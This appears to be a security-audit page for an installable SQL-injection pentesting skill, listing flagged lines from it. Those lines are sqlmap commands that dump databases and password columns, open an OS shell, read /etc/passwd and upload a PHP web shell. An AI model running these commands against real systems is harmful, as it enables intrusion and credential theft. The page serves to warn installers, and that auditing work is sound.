sqlmap-database-pentesting
Automates SQL injection testing and database enumeration using SQLMap for effective penetration testing.
Install this skill
Security score
The sqlmap-database-pentesting skill was audited on Feb 28, 2026 and we found 28 security issues across 2 threat categories, including 1 high-severity. Review the findings below before installing.
Categories Tested
Security Issues
Access to /etc/passwd
| 306 | sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch |
Access to root home directory
| 258 | sqlmap -r /root/Desktop/login.txt -p username --dbs --batch |
Access to root home directory
| 395 | sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session |
External URL reference
| 41 | http://target.com/page.php?id=1' |
External URL reference
| 50 | sqlmap -u "http://target.com/page.php?id=1" --batch |
External URL reference
| 53 | sqlmap -u "http://target.com/page.php?id=1" --batch -v 3 |
External URL reference
| 60 | sqlmap -u "http://target.com/page.php?id=1" --dbs --batch |
External URL reference
| 72 | sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch |
External URL reference
| 83 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch |
External URL reference
| 94 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch |
External URL reference
| 99 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch |
External URL reference
| 104 | sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch |
External URL reference
| 129 | # http://target1.com/page.php?id=1 |
External URL reference
| 130 | # http://target2.com/page.php?id=2 |
External URL reference
| 233 | sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch |
External URL reference
| 237 | sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch |
External URL reference
| 241 | sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch |
External URL reference
| 245 | sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch |
External URL reference
| 264 | echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt |
External URL reference
| 265 | echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt |
External URL reference
| 274 | sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3 |
External URL reference
| 277 | sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ |
External URL reference
| 283 | sqlmap -u "http://target.com/page.php?id=1" \ |
External URL reference
| 290 | sqlmap -u "http://target.com/page.php?id=1" \ |
External URL reference
| 300 | sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch |
External URL reference
| 303 | sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch |
External URL reference
| 306 | sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch |
External URL reference
| 309 | sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch |